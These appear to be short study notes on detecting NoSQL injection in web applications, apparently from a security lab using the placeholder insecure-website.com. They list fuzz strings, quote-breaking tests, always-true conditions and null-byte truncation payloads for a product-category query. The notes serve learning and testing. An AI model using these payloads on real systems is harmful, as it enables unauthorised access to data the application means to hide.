try fuzz string

'"`{
;$Foo}
$Foo \\xYZ

in a url

'%22%60%7b%0d%0a%3b%24Foo%7d%0d%0a%24Foo%20%5cxYZ%00

in a json

'\\"`{\\r;$Foo}\\n$Foo \\\\xYZ\\u0000

If this causes a change from the original response, this may indicate that user input isn't filtered or sanitized correctly.

try submit ‘ this.category == '''

If this cause an error, this may indicate that the ' character has broken the query syntax and caused a syntax error.

then this.category == '\\''

If this doesn't cause a syntax error, this may mean that the application is vulnerable to an injection attack.

try use the conditional statements ' && 0 && 'x and ' && 1 && 'x

<https://insecure-website.com/product/lookup?category=fizzy'+%26%26+0+%26%26+'x>
<https://insecure-website.com/product/lookup?category=fizzy'+%26%26+1+%26%26+'x>

try '||1||' : always true

try '%00 in url or '\\u0000 in json : to cut the rest of the query

<https://insecure-website.com/product/lookup?category=fizzy>'%00
this.category == 'fizzy'\\u0000' && this.released == 1